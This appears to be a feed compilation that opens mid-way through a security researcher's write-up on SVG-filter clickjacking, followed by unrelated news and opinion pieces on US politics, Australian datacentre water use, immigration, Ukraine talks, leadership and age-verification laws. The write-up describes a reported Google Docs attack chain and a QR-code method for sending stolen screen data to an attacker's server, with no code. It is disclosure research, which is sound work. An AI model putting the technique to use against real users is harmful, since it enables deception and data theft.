Play around with this and see just how much more convincing it is as an attack. And we could easily make it better by, for example, adding some extra logic to also add hover visuals to the buttons. The demo has debug visuals for the four inputs (D, L, C, R) in the bottom left as squares to make it easier to understand what’s going on.

But yeah, that’s how you can make complex and long clickjacking attacks that have not been realistic with the traditional clickjacking methods.

I kept this example here pretty short and simple, but real-world attacks can be a lot more involved and polished.

In fact…

The Docs bug

I’ve actually managed to pull off this attack against Google Docs!

Take a look at the demo videos here (alt links: bsky , twitter ).

What this attack does is:

  • Makes the user click on the “Generate Document” button
  • Once pressed, detects the popup and shows a textbox for the user to type a “captcha” into
    • The textbox starts off with a gradient animation, which must be handled
    • The textbox has focus states, which must also be present in the attack visuals, so they must be detected by the background color of the textbox
    • The textbox has grey text for both a placeholder AND suggestions, which must be hidden with the technique discussed earlier
  • Once the captcha is typed, makes the user seemingly click on a button (or press enter), which causes a suggested Docs item to be added into the textbox
    • This item must be detected by looking for its background color in the textbox
  • Once the item is detected, the textbox must be hidden and another button must be shown instead
    • Once that button is clicked, a loading screen appears, which must be detected
  • If the loading screen is present, or the dialog is not visible and the “Generate Document” button is not present, the attack is over and the final screen must be shown

In the past, individual parts of such an attack could’ve been pulled off through traditional clickjacking and some basic CSS, but the entire attack would’ve been way too long and complex to be realistic. With this new technique of running logic inside SVG filters, such attacks become realistic.

Google VRP awarded me $3133.70 for the find. That was, of course, right before they introduced a novelty bonus for new vulnerability classes. Hmph! 10

The QR attack

Something I see in online discussions often is the insistence on QR codes being dangerous. It kind of rubs me the wrong way because QR codes are not any more dangerous than links.

I don’t usually comment on this too much because it’s best to avoid suspicious links, and the same goes for QR codes, but it does nag me to see people make QR codes out to be this evil thing that can somehow immediately hack you.

It turns out, though, that my SVG filters attack technique can be applied to QR codes as well!

The example from earlier in the blog with retyping a code becomes impractical once the user realizes they’re typing something they shouldn’t. We can’t stuff the data we exfiltrate into a link either, because an SVG filter cannot create a link.

But since an SVG filter can run logic and provide visual output, perhaps we could generate a QR code with a link instead?

Creating the QR

Creating a QR code within an SVG filter is easier said than done, however. We can arrange binary data into the shape of a QR code by using feDisplacementMap , but for a QR code to be scannable it also needs error correction data.

QR codes use Reed-Solomon error correction , which is some fun math stuff that’s a bit more advanced than a simple checksum. It does math with polynomials and stuff and that is a bit annoying to reimplement in an SVG.

Luckily for us, I’ve faced the same problem before! Back in 2021 I was the first person 11 to make a QR code generator in Minecraft , so I’ve already figured out the things necessary.

In my build I pre-calculated some lookup tables for the error correction, and used those instead to make the build simpler - and we can do the same with the SVG filter.

This post is already getting pretty long, so I’ll leave figuring out how this filter works as an exercise to the reader ;).

Hover to see QR

This is a demo that displays a QR code telling you how many seconds you’ve been on this page for. It’s a bit fiddly, so if it doesn’t work make sure that you aren’t using any display scaling or a custom color profile . On Windows you can toggle the Automatically manage color for apps setting, and on a Mac you can set the color profile to sRGB for it to work.

This demo does not work on mobile devices . And also, for the time being, it only works in Chromium-based browsers , but I believe it could be made to work in Firefox too.

Similarly, in a real attack, the scaling and color profile issues could be worked around using some JavaScript tricks or simply by implementing the filter a bit differently - this here is just a proof of concept that’s a bit rough around the edges.

But yeah, that's a QR code generator built inside an SVG filter!

Took me a while to make, but I didn’t want to write about it just being “theoretically possible”.

Attack scenario

So the attack scenario with the QR code is that you'd read pixels from a frame, process them to extract the data you want, encode them into a URL that looks something like https://lyra.horse/?ref=c3VwZXIgc2VjcmV0IGluZm8 and render it as a QR code.

Then, you prompt the user to scan the QR code for whatever reason (eg anti-bot check). To them, the URL will seem like just a normal URL with a tracking ID or something in it.

Once the user opens the URL, your server gets the request and receives the data from the URL.

And so on..

There are so many ways to make use of this technique I won’t have time to go over them all in this post. Some examples would be reading text by using the difference blend mode, or exfiltrating data by making the user click on certain parts of the screen.

You could even insert data from the outside to have a fake mouse cursor inside the SVG that shows the pointer cursor and reacts to fake buttons inside your SVG to make the exfiltration more realistic.

Or you could code up attacks with CSS and SVG where CSP doesn’t allow for any JS.

Anyways, this post is long as is, so I’ll leave figuring out these techniques as homework.

Novel technique

This is the first time in my security research I’ve found a completely new technique!

I introduced it briefly at my BSides talk in September , and this post here is a more in-depth overview of the technique and how it can be used.

Of course, you can never know 100% for sure that a specific type of attack has never been found by anyone else, but my extensive search of existing security research has come up with nothing, so I suppose I can crown myself as the researcher who discovered it?

Here’s some previous research I’ve found:

I don’t think me discovering this technique was just luck though. I have a history of seeing things such as CSS as programming languages to exploit and be creative with. It wasn’t a stretch for me to see SVG filters as a programming language either.

That, and my overlap between security research and creative projects - I often blur the lines between the two, which is what Antonymph was born out of.

In any case, it feels yay :3 woof yippie waow awesome meow awrf to discover something like this.

afterword

whoa this post took such a long time for me to get done!

i started work on it in july, and was expecting to release it alongside my CSS talk in september, but it has taken me so much longer than expected to actually finish this thing. i wanted to make sure it was a good in-depth post, rather than something i just get out as soon as possible.

unlike my previous posts, i did unfortunately have to break my trend of using no images, since i needed a few data URIs within the SVG filters for demos. still, no images anywhere else in the post, no javascript, and just 42kB (gzip) of handcrafted html/css/svg.

also, i usually hide a bunch of easter eggs in my post that link to stuff i’ve enjoyed recently, but i have a couple links i didn’t want to include without content warnings. finding responsibility is a pretty dark talk about the ethics of making sure your work won’t end up killing people, and youre the one ive always wanted is slightly nsfw doggyhell vent art.

btw i’ll soon be giving talks at 39c3 and disobey 2026 ! the 39c3 one is titled “ css clicker training ” and will be about css crimes and making games in css. and the disobey one is the same talk as the bsides one about using css to hack stuff and get bug bounties, but i’ll make sure to throw some extra content in there to keep it fun.

see y’all around!!

<3

Discuss this post on: twitter , mastodon , lobsters

She Lost Her Job for Speaking Out About Gaza. Can It Power Her to Congress?

Intercept
theintercept.com
2025-12-04 14:02:58
Justice Democrats endorsed Melat Kiros in Denver as the progressive group looks to recover from crushing losses to AIPAC-backed candidates last cycle. The post She Lost Her Job for Speaking Out About Gaza. Can It Power Her to Congress? appeared first on The Intercept....
Original Article

Attorney Melat Kiros lost her job in 2023 after she wrote a post on Medium criticizing law firms, including her own, for opposing pro-Palestine protests and “chilling future lawyers’ employment prospects for criticism of the Israeli government’s actions and its legitimacy.” Now, she’s running for Congress to replace a nearly three-decade incumbent in Denver and calling to end U.S. military aid to Israel.

The progressive outfit Justice Democrats announced Thursday it was endorsing Kiros, who first launched her campaign in July. She’s the sixth candidate the group is backing in the upcoming midterm primaries, as Justice Democrats recharts its course after pro-Israel groups last cycle helped oust two of its star recruits, Reps. Jamaal Bowman, D-N.Y., and Cori Bush, D-Mo.

In an interview with The Intercept, Kiros, who is 28, said watching Bowman and Bush lose their races and President Donald Trump take back the White House fueled despair among people her age. “But ultimately there are things that we can do, common-sense policies that we can pass — like Medicare for All, housing first, universal child care — that we just need people in Congress that actually represent us and not their wealthy donors to fight for,” she said.

“They wish they could speak up too, but … they couldn’t afford to lose their health insurance.”

Kiros has also been motivated by what she described as a “coercive market” that has chilled speech against genocide in Gaza. She decided to write the post that ultimately led to her firing after her experience protesting another genocide in her home region of Tigray, Ethiopia. After she lost her job, she took on policy work in a Ph.D. program, which eventually motivated her to run for Congress.

“I got messages from hundreds of attorneys afterwards saying that they wish they could speak up too, but that they couldn’t afford to lose their job, that they couldn’t afford to lose their health insurance,” Kiros said. She doesn’t think true freedom of expression exists “when you can’t speak out on basic human rights without it risking your job.”

In Congress, Kiros hopes to take on the issue of big money in politics — not just how it shapes policy, but how it has chilled speech on matters of human rights.

In her campaign against Rep. Diana DeGette, who was elected the year before she was born, Kiros is arguing the incumbent has grown more disconnected from her constituents over her 28 years in Congress — and embodies the Democratic Party’s failures to deliver in the face of a right-wing assault on civil liberties and the corporate and elite capture of bipartisan politics.

“DeGette is a symptom of a political system that rewards complacency, not courage,” Justice Democrats wrote in its endorsement of Kiros. The group has focused its 2026 strategy on challenging incumbents it says are beholden to corporate donors and trying to build a bench in Congress to fight authoritarianism, corporate super PACs, and billionaire-funded lobbying groups like the American Israel Public Affairs Committee.

DeGette did not respond to requests for comment before publication.

DeGette’s campaign, meanwhile, is highlighting what she describes as her experience fighting to protect the environment and expand access to health care. As a longtime incumbent, she has a clear fundraising advantage: DeGette has raised just under half a million dollars this year, more than three times the $125,000 Kiros has raised so far.

Kiros said most of her campaign funds have come from more than 2,300 individual donors, most of them small-dollar, with an average donation of $47, though the campaign’s latest FEC filings only reflect about 300 individual donors. (FEC records do not always include contributions from donors who have given under $200.)

In addition to Kiros, five other Democratic candidates are currently slated to challenge DeGette, including veteran Wanda James, a member of the University of Colorado Board of Regents.

Speaking to The Intercept, Kiros criticized DeGette for taking more than $5 million throughout her career from corporate PACs. Justice Democrats has also denounced her for taking money from lobbies for the pharmaceutical, fossil fuel, and defense industries. According to OpenSecrets, DeGette’s top career contributor is the law and lobbying firm Brownstein Hyatt Farber Schreck, founded and chaired by attorney and former AIPAC Vice President and board member Norman Brownstein.

After taking crushing losses in two high-profile races in which AIPAC spent heavily last cycle, Justice Democrats has endorsed five other candidates so far this cycle, challenging incumbents in five states. That includes Bush in her comeback run for her old seat in Missouri’s 1st Congressional District, state Rep. Justin Pearson in Tennessee’s 9th District, Darializa Avila Chevalier in New York’s 13th District, Angela Gonzales Torres in California’s 34th District, and state Rep. Donavan McKinney in Michigan’s 13th District. The group is “on track” to endorse at least 10 new candidates by January, according to its spokesperson, Usamah Andrabi.

The strategy is a shift from 2024, when Justice Democrats only endorsed its incumbents after making its name backing new insurgent candidates.

“We started this cycle with clear eyes about our intentions to fight back and win against AIPAC, crypto, and every other corporate lobby by challenging as many entrenched corporate incumbents and electing real, working-class champions to lead this party forward,” Andrabi said.

Growing disapproval of both the Democratic Party and Trump has proven how much Democratic voters want to use the primary system to change a party they see as bought by billionaires, Andrabi said.

“The momentum of the Democratic Party’s base is on our side and lobbies like AIPAC are losing sway over voters as their spending, influence, and right-wing network is exposed,” he said. “We’re not holding back this cycle and the establishment feels it.”

Fueling that disillusionment is the United States’ role in Israel’s genocide in Gaza, which Kiros has made a focus of her campaign. She’s calling for an end to U.S. military aid to Israel and an Israeli arms embargo, and has called DeGette out of step with the district for not signing onto a bill pushing for the latter.

DeGette has a mixed record on Israel. She has described herself as a longtime supporter of Israel, taken some money from pro-Israel groups throughout her career, and met with members of AIPAC in her district.

In the weeks after the October 7, 2023 attacks, DeGette voted with 193 other Democrats against a Republican bill — which former President Joe Biden had threatened to veto — to provide aid to Israel, saying it ignored humanitarian needs in Gaza. She voted with the bulk of her party for other pro-Israel bills after October 7, including a hawkish bill affirming Israel’s right to self-defense with no mention of Palestinian civilians. DeGette did not co-sponsor an alternative resolution introduced by then-Rep. Bush and Rep. Rashida Tlaib, D-Mich., which called for an immediate ceasefire and humanitarian aid to Gaza. This year, DeGette co-sponsored bills to prevent violence in the West Bank and restore funding to the United Nations Relief and Works Agency for Palestine Refugees.

“It’s not enough that you vote the right way,” said Kiros. “This idea that any Democrat will do — it’s not enough anymore.”

Thirsty work: how the rise of massive datacentres strains Australia’s drinking water supply

Guardian
www.theguardian.com
2025-12-04 14:00:24
The demand for use in cooling in Sydney alone is expected to exceed the volume of Canberra’s total drinking water within the next decadeSign up for climate and environment editor Adam Morton’s free Clear Air newsletter hereAs Australia rides the AI boom with dozens of new investments in datacentres ...
Original Article

As Australia rides the AI boom with dozens of new investments in datacentres in Sydney and Melbourne, experts are warning about the impact these massive projects will have on already strained water resources.

Water demand to service datacentres in Sydney alone is forecast to be larger than the volume of Canberra’s total drinking water within the next decade.

In Melbourne the Victorian government has announced a “$5.5m investment to become Australia’s datacentre capital”, but the hyperscale datacentre applications already on hand would exceed the water demands of nearly all of the state’s top 30 business customers.

Technology companies, including OpenAI and Atlassian, are pushing for Australia to become a hub for data processing and storage. But with 260 datacentres operating and dozens more in the offing, experts are flagging concerns about the impact on the supply of drinking water.

Sydney Water has estimated up to 250 megalitres a day would be needed to service the industry by 2035 (a larger volume than Canberra’s total drinking water).

Cooling requires ‘huge amount of water’

Prof Priya Rajagopalan, director of the Post Carbon Research Centre at RMIT, says water and electricity demands of datacentres depend on the cooling technology used.

“If you’re just using evaporative cooling, there is a lot of water loss from the evaporation, but if you are using chillers, there is no water loss but it requires a huge amount of water to cool,” she says.

While older datacentres tend to rely on air cooling, demand for more computing power means higher server rack density so the output is warmer, meaning centres have turned to water for cooling .

The amount of water used in a datacentre can vary greatly. Some operators, such as NextDC, are moving towards liquid-to-chip cooling, which cools the processor or GPU directly instead of using air or water to cool the whole room.

NextDC says it has completed an initial, smaller deployment of the cooling technology, but that it has the capacity to scale up for ultra-high-density environments. Because liquid cooling is more efficient, this would allow for greater processing power without an associated rise in power consumption. The company says its modelling suggests power usage effectiveness (PUE, a measure of energy efficiency) could go as low as 1.15.


The datacentre industry accounts for its sustainability with two metrics: water usage effectiveness (WUE) and power usage effectiveness (PUE). These measure the amount of water or power used relative to computing work.

WUE is measured as annual water use (in litres) divided by annual IT energy use (in kWh). For example, a 100MW datacentre using 3ML a day would have a WUE of 1.25. The lower the number, the more efficient the facility. Several countries set standards; Malaysia, for example, has recommended a WUE of 1.8.
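Spelling that example out (assuming the 100MW refers to IT load): 100,000kW × 24h = 2,400,000kWh of IT energy a day, and 3ML is 3,000,000 litres, so WUE = 3,000,000 ÷ 2,400,000 = 1.25 litres per kWh.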

But even efficient facilities can still use large quantities of water and energy, at scale.

NextDC’s PUE in the last financial year was 1.44, up from 1.42 the previous year, which the company says “reflects the dynamic nature of customer activity across our fleet and the scaling up of new facilities”.

Calls for ban on use of drinking water

Sydney Water says its estimates of datacentre water use are being reviewed regularly. The utility is exploring climate-resilient and alternative water sources such as recycled water and stormwater harvesting to prepare for future demand.

“All proposed datacentre connections are individually assessed to confirm there is sufficient local network capacity and operators may be required to fund upgrades if additional servicing is needed,” a Sydney Water spokesperson says.

In its submission to the Victorian pricing review for 2026 to 2031, Melbourne Water noted that hyperscale datacentre operators that have put in applications for connections have “projected instantaneous or annual demands exceeding nearly all top 30 non-residential customers in Melbourne”.

“We have not accounted for this in our demand forecasts or expenditure planning,” Melbourne Water said.

It has sought upfront capital contributions from the companies so the financial burden of works required “does not fall on the broader customer base”.

Greater Western Water in Victoria had 19 datacentre applications on hand, according to documents obtained by the ABC and provided to the Guardian.


The Concerned Waterways Alliance, a network of Victorian community and environment groups, has flagged its concerns about the diversion of large volumes of drinking water to cool servers, when many of the state’s water resources are already stretched.

Cameron Steele, a spokesperson for the alliance, says datacentre growth could increase Melbourne’s reliance on desalinated water and reduce water available for environmental flows, with the associated costs borne by the community. The groups have called for a ban on the use of drinking water for cooling, and mandatory public reporting of water use for all centres.

“We would strongly advocate for the use of recycled water for datacentres rather than potable drinking water.”

Closed-loop cooling

In hotter climates, such as large parts of Australia during the summer months, centres require more energy or water to keep cool.

Danielle Francis, manager of customer and policy at the Water Services Association of Australia, says there isn’t a one-size-fits-all approach for how much energy and water datacentres use because it will depend on the local constraints such as land, noise restrictions and availability of water.

“We’re always balancing all the different customers, and that’s the need for residential areas and also non-residential customers, as well as of course environmental needs,” Francis says.

“It is true that there are quite a lot of datacentre applications. And the cumulative impact is what we have to plan for … We have to obviously look at what the community impact of that is going to be.

“And sometimes they do like to cluster near each other and be in a similar location.”

One centre under construction in Sydney’s Marsden Park is a 504MW datacentre spanning 20 hectares, with six four-storey buildings. The CDC centre will become the largest data campus in the southern hemisphere, the company has boasted.

In the last financial year, CDC used 95.8% renewable electricity in its operational datacentres, and the company boasts a PUE of 1.38 and a WUE of 0.01. A spokesperson for the company says it has been able to achieve this through a closed-loop cooling system that eliminates ongoing water draw, rather than relying on the traditional evaporative cooling systems.

“The closed-loop systems at CDC are filled once at the beginning of their life and operate without ongoing water draw, evaporation or waste, ensuring we are preserving water while still maintaining thermal performance,” a spokesperson says.

“It’s a model designed for Australia, a country shaped by drought and water stress, and built for long-term sustainability and sets an industry standard.”

Planning documents for the centre reveal that, despite CDC’s efforts, there remains some community concern over the project.

In a June letter, the acting chief executive of the western health district of New South Wales, Peter Rophail, said the development was too close to vulnerable communities, and that the unprecedented scale of the development was untested and represented an unacceptable risk to western Sydney communities.

“The proposal does not provide any assurance that the operation can sufficiently adjust or mitigate environmental exposures during extreme heat weather events so as not to pose an unreasonable risk to human health,” Rophail said.

West African Asylum Seekers Find Safe Haven in NYC Volunteer-Run Kitchen

Democracy Now!
www.democracynow.org
2025-12-04 13:46:55
Amid escalating ICE raids in New York City, Democracy Now’s Messiah Rhodes spoke to immigrants and advocates supporting newly arrived migrants and asylum seekers from West Africa with hot meals, legal advice and job training. “When I help the people here, the people will help me one day,...
Original Article


Amid escalating ICE raids in New York City, Democracy Now! ’s Messiah Rhodes spoke to immigrants and advocates supporting newly arrived migrants and asylum seekers from West Africa with hot meals, legal advice and job training. “When I help the people here, the people will help me one day,” Guinean immigrant Abdul Karim, a cook at Cafewal weekday kitchen, told Rhodes.

Murad Awawdeh, of the New York Immigration Coalition and a member of New York City Mayor-elect Zohran Mamdani’s transition team, also comments. He shares how the incoming mayoral administration can work to protect immigrants from Trump’s anti-immigrant agenda.






Transparent Leadership Beats Servant Leadership

Hacker News
entropicthoughts.com
2025-12-04 13:40:00
Comments...
Original Article

tl;dr: Parenting and leadership are similar. Teach a man to fish, etc.


I spent a couple of years managing a team, and I entered that role – like many – without knowing anything about how to do it. I tried to figure out how to be a good manager, and in doing so I ended up reading a lot about servant leadership. It never quite sat right with me, though. Servant leadership seems to me a lot like curling parenting: the leader/parent anticipates problems and sweeps the way for their direct reports/children.

To be clear, this probably feels very good (initially, anyway) for the direct reports/children. But the servant leader/curling parent quickly becomes an overworked single point of failure, and once they leave there is nobody else who knows how to handle the obstacles the leader used to move out of everyone’s way. In the worst cases, they leave behind a group of people who have been completely isolated from the rest of the organisation, and who have no idea what their purpose is or how to fit in with the rest of the world.

I would like to invent my own buzzword: transparent leadership . In my book, a good leader

  • coaches people,
  • connects people,
  • teaches people methodical problem solving,
  • explains values and principles embraced by the organisation to aid them in making aligned decisions on their own,
  • creates direct links between supply and demand (instead of deliberately making themselves a middle man),
  • allows their direct reports career growth by gradually taking over leadership responsibilities,
  • continuously trains their replacement, and
  • generally makes themselves redundant.

The middle manager that doesn’t perform any useful work is a fun stereotype, but I also think it’s a good target to aim for. The difference lies in what to do once one has rendered oneself redundant. A common response is to invent new work, ask for status reports, and add bureaucracy.

A better response is to go back to working on technical problems. This keeps the manager’s skills fresh and gets them more respect from their reports. The manager should turn into a high-powered spare worker, rather than a paper-shuffler.

"Making America White Again": Trump Further Restricts Immigration, Ramps Up ICE Raids

Democracy Now!
www.democracynow.org
2025-12-04 13:37:30
Immigrant rights advocate Murad Awawdeh joins us to discuss Donald Trump’s nationwide anti-immigrant crackdown and how it’s manifested in Trump’s hometown of New York City, where hundreds of New Yorkers recently blocked a federal immigration raid targeting street vendors from West ...
Original Article


Immigrant rights advocate Murad Awawdeh joins us to discuss Donald Trump’s nationwide anti-immigrant crackdown and how it’s manifested in Trump’s hometown of New York City, where hundreds of New Yorkers recently blocked a federal immigration raid targeting street vendors from West Africa before it even started. “This has never been about vetting. This has never been about security and safety. It’s about cruelty,” says Awawdeh about the Trump administration’s persecution of immigrants. “His war on immigrants and his mass deportation agenda is all to lead to making America white again.”






The Age-Gated Internet Is Sweeping the US. Activists Are Fighting Back

Hacker News
www.wired.com
2025-12-04 13:34:27
Comments...
Original Article

Members of Congress considered 19 online safety bills Tuesday that may soon have a major impact on the future of the internet, as age-verification laws have spread to half of the US and around the world.

In response, digital and human rights organization Fight for the Future is hosting a week of events—across Reddit, LinkedIn, and various livestreams—to raise awareness of how it believes these bills are setting a dangerous precedent by making the internet more exploitative rather than safer. Many of the proposed bills include a clause for ID or age verification, which forces people to upload an ID, allow a face scan, or otherwise authenticate that they are not a minor before viewing adult content. Fight for the Future says the policies will lead to increased censorship and surveillance.

Among the 19 bills considered at the hearing conducted by the House Energy and Commerce Committee was the Kids Online Safety Act (KOSA), which passed with sweeping bipartisan approval in the Senate last year, and the Reducing Exploitative Social Media Exposure for Teens Act, which would ban tech companies from allowing minors under the age of 16 on their platforms. In addition to age verification, the bills raised concerns over parental controls, consumer research of minors, AI, and data privacy.

“We’re seeing this huge wave toward ID checks being the norm in tech policy, and it felt like we needed to capture the already activated communities who are not feeling heard in Congress,” says Sarah Philips, a campaigner with Fight for the Future. “If you look on YouTube, if you see people making content about KOSA or responding to a lot of this legislation, it’s very unpopular with people. But it’s viewed on the Hill as very common-sense.”

Missouri’s age-gate law took effect earlier this week, meaning 25 US states have passed a form of age verification. The process usually involves third-party services, which can be especially prone to data breaches. This year, the UK also passed a mandate for age verification—the Online Safety Act—and Australia’s teen social media ban, which requires social media companies to deactivate the accounts of users under the age of 16, goes into effect on December 10. Instagram, YouTube, Snap, and TikTok are complying with the historic ban.

Philips believes the laws are a direct threat to democratic freedom. “These are censorship laws,” she says. “In the South, where I live, these same proposals mimic a lot of the arguments that you see behind book bans and behind laws that criminalize gender-affirming health care or abortion information.”

In March, over 90 human rights advocacy groups signed a coalition letter opposing online ID-check mandates. “The internet is not improved by treating its users like criminal suspects and our lives as opportunities for corporate profit,” David Swanson, campaign coordinator at RootsAction.org, wrote in the letter. “Legislators defunding education to invest in wars, police, prisons, borders, and constant surveillance should think hard before claiming to be acting on behalf of children.”

Though Tuesday’s hearing did not advance any legislation, it included testimonies from Joel Thayer, president of the Digital Progress Institute, and Kate Ruane, director of the Free Expression Project at the Center for Democracy and Technology. “The government and social media platforms should not be—indeed, with respect to the government, cannot be—the sole arbiters of the content children can see and services that they can access online,” Ruane said during her testimony.


Fight for the Future’s resistance campaign against online age verification.

Courtesy of Fight for the Future

The package of bills is indicative of how Congress has failed to deliver real solutions, Philips says. “We have repeatedly asked them to focus on comprehensive privacy legislation, on antitrust issues, and on things that actually protect us from the surveillance capitalist business model of big tech companies. Congress says they’re holding big tech accountable, but most of the options on the table just mandate verification.” According to The Verge, a revamped version of KOSA removes tech companies’ liability in mitigating potential harms caused by their platforms.

In an op-ed for Teen Vogue published in October, Fight for the Future director Evan Greer and campaigner Janus Rose criticized Democratic lawmakers who support KOSA, including the bill’s cowriter, Senator Richard Blumenthal of Connecticut. “KOSA takes the same logic of the bans on drag shows and LGBTQ+ books and applies it to the internet, allowing censorship of a broad range of information in the name of protecting kids from real online harm,” Greer noted.

But since KOSA and the Children and Teens’ Online Privacy Protection Act failed to gain approval last year, “it’ll be interesting to see what actually floats to the top right now,” Philips says, concerned that some of the bills could be attached to the National Defense Authorization Act or have the Trump administration’s 10-year moratorium on state AI regulations attached to them, “which is a disaster tornado of tech policies.”

Philips tells me she isn’t disheartened by the work, because she wants people to understand what’s really at stake in the fight ahead.

“The thing that people misunderstand most about age verification is that it actually applies to all of us,” she says. “A lot of the people pushing for age verification solely focus on kids, because that’s the discussion happening in Congress or on the Hill. But in actuality, if we age-gate the internet and implement mandates, that means that you have to prove that you’re not a child—whether you’re 18 or 50. Everyone will have to interact with this.”

Can a Deal Be Reached to End Russia's War in Ukraine? Matt Duss on Latest Diplomatic Efforts

Democracy Now!
www.democracynow.org
2025-12-04 13:25:48
Foreign policy analyst Matt Duss discusses the status of Russia-Ukraine ceasefire talks and new data on the extent of casualties from the now nearly four-year Russian invasion of Ukraine. Hundreds of thousands of people have been killed. “For what did these people die? For what reason were the...
Original Article

This is a rush transcript. Copy may not be in its final form.

NERMEEN SHAIKH : Matt Duss, you’re the executive vice president at the Center for International Policy and also former foreign policy adviser to Senator Bernie Sanders. We also want to ask you about the ongoing negotiations to end Russia’s war on Ukraine. On Tuesday, President Trump’s envoy Steve Witkoff and son-in-law Jared Kushner met with Russian President Vladimir Putin in Moscow for nearly five hours, but a deal to end the war in Ukraine was not reached. Russian officials described the talks as “constructive” but said no compromise was reached on certain issues.

AMY GOODMAN : Witkoff and Kushner are set to meet today with Ukraine’s lead negotiator in Florida for further talks. Meanwhile, Putin is now in India meeting with Prime Minister Narendra Modi. This all comes as Germany’s foreign minister has criticized Russia, saying he had seen no serious willingness on the Russian side to enter into negotiations. And NATO says, of course, that they’re going to continue to supply U.S. weapons — pay for and then supply U.S. weapons to Ukraine. Where does all this stand, Matt?

MATT DUSS : I think, well, I mean, first of all, I would say efforts to end this war through diplomacy are good, and I commend them. I think most Americans would like to see this war end. Certainly the Ukrainians want this war to end. The Europeans want this war to end. But once again, I think we have arrived at the same place, which is that Vladimir Putin does not want this war to end, certainly not on terms that would be remotely acceptable to Ukraine, by which I mean a resolution to this war that sustains and preserves Ukraine’s independence, its democracy and its ability to defend itself.

I think a lot of people were kind of surprised by the extent to which the 28-point plan that was leaked a few weeks ago really, essentially, you know, echoed Russia’s preferences. Some people said it was written in Russia. I don’t know if that’s true, but it clearly did reflect a lot of Vladimir Putin’s own preferences for how the war should end. As an opening bid, I don’t think we should make too much of it. It is good that these talks are going on. But again, I think we’ve arrived at the same place, which is that the person who has a very, very important vote here, Vladimir Putin, is not supporting an end to the war.

NERMEEN SHAIKH : Well, it’s extraordinary, Matt, because I did read over those 28 points, and it does seem, as many have commented, that most of Russia’s demands have been met. So, what explains their resistance to this proposal? And what parts did they — do we know what they took umbrage with, that they don’t want to agree to?

MATT DUSS : Well, I think there are issues. You know, there was kind of a negotiation going on within the Trump administration. You know, Witkoff and Kushner put out this plan or were, you know, involved in constructing it initially. Secretary of State Rubio then made changes internally. There’s a kind of fight between the Rubio and the Vance wing in the Trump administration here, with the Vance wing being much more aggressively trying to end this war.

I think that some of the key concerns were the kind of agreement that Russia — excuse me, that Ukraine would not join NATO as a promise. Some people see that as unacceptable. Personally, my own view is everyone, I think, understands that Ukraine will not be joining NATO . I understand that you don’t want to take that off the table at the outset of negotiations, but I don’t think that should be — you know, that shouldn’t be allowed to be a roadblock to an agreement.

At the same time, I also don’t think that is the only thing that concerns Russia. As I said, Vladimir Putin’s goals here, in my view, have not changed. I’ve seen no evidence that his initial goal of curtailing Ukraine’s independence and bringing it back under, essentially, Russian authority as a part of a broader Russian imperium, that remains his ultimate goal. And any agreement short of that, it seems to me, he’s not going to go for.

NERMEEN SHAIKH : And, in fact, on NATO , which, of course, many speculated that this was indeed the reason that Russia invaded Ukraine, it’s not only that the plan calls for an end to NATO expansion, but it says specifically, singling out Ukraine, that Ukraine should inscribe in its constitution that it will not join NATO , and that NATO would include in its statutes a provision that Ukraine will not be admitted. If you could —

MATT DUSS : Yeah.

NERMEEN SHAIKH : — comment on that?

MATT DUSS : Yeah, I think that that really just goes way, way too far. I think there are — there are commitments that could be made, assurances that could be made with regard to Ukraine and NATO . But again, I do not think that NATO and Ukraine’s possibility or impossibility of joining NATO is really the issue here. It is one among a whole set of issues that indicate Ukraine’s ultimate orientation and its ultimate independence. Ukraine’s independence is the real issue here, as far as I can tell.

NERMEEN SHAIKH : And the plan also says that all parties to the conflict — I mean, Ukraine and Russia — will receive full amnesty once the proposal goes into effect, the ceasefire, if indeed that’s what it is, the peace plan, which seems, some have said, in part, geared towards having the ICC warrant against Putin lifted and also —

MATT DUSS : Yeah.

NERMEEN SHAIKH : — absolving Russia of alleged war crimes, including what happened in Bucha. If you could comment on that?

MATT DUSS : Yeah. I mean, that is — that’s really objectionable. But, you know, again, as hard as it is to say, if that’s something that gets us to an end to the war, a durable end to the war, that is something that we should consider. This is certainly not justice for the many, many victims of Russia’s violence, which has been grotesque.

Unfortunately, the United States itself is not in a great position here, given the cover that we continue to give to partners like Israel for their war crimes in Gaza, clearly war crimes. So, I think the United States and its allies in Europe would be in a much better position to push back against this if we were applying these standards equally, which we are not.

AMY GOODMAN : And, Matt Duss, the significance of the corruption scandal that’s been engulfing the Zelensky administration, with his number two man, Andriy Yermak, the chief of staff to Zelensky, being forced out? You usually always see him at his side.

MATT DUSS : Yeah, no, I think this has been a corruption scandal that has been brewing for a while, and the firing of Zelensky’s number two man, his chief of staff, is obviously very significant. Ukraine continues to struggle with corruption problems that go back a long time. But I also think it’s worth noting, the fact that the number two leader in Ukraine was removed from power because of a corruption investigation is itself a very, very positive step.

NERMEEN SHAIKH : And finally, Matt, if you could comment on the sheer scale of the destruction that this war has wrought, not only in terms of, you know, entire areas in Ukraine being flattened, but also that Russia has suffered over 600,000 casualties? That is to say, people killed and wounded. This is roughly 10 times the number of Soviet casualties suffered over a decade in their invasion and occupation of Afghanistan. And open-source data has revealed that 111,000 Russian military personnel have been killed. Meanwhile, also open-source data shows that there have been about 400,000 Ukrainian casualties. And Zelensky himself has said that 43,000 Ukrainian soldiers have been killed. So, if you could talk about this? I mean, this is a really extraordinary — these are extraordinary numbers.

MATT DUSS : Yeah, it is extraordinary, and it’s just a staggering waste. I mean, for what? For what did these people die? For what reason were they sent into this horrible meat grinder? For what was this destruction done? To take some land in eastern Ukraine?

I think this is — again, as horrible as this is and as horrible it is to consider the fact that there might have to be some form of amnesty, I do also think it’s worth noting that Vladimir Putin, after nearly four years of war, has not achieved anything close to his ultimate goal. And I do think this is worth considering as we talk about the possibility of a ceasefire. Ukraine has performed far — has done greater things than I think anyone expected. So, given the loss of life, given the destruction, I know it’s hard for many Ukrainians to consider having to make some concessions to end the war, but I do think there is a victory narrative here for Ukraine to take.

One other thing I do want to mention in terms of the costs of this war is the tens of thousands of Ukrainian children that were taken into Russia and distributed among Russian families. That is absolutely something we should not forget. That is something on which there should be no compromise. These children need to be returned to their families.

NERMEEN SHAIKH : And what does the — what does the plan say about that, the proposal that the U.S. has put forth?

MATT DUSS : I’m unclear what it says on that. This is something that’s clearly going to be contested as we get into the — if we get into anything close to final status talks, which it doesn’t seem like we’re close to right now.

AMY GOODMAN : Matt Duss, we want to thank you so much for being with us, executive vice president at the Center for International Policy and former foreign policy adviser to Senator Bernie Sanders.

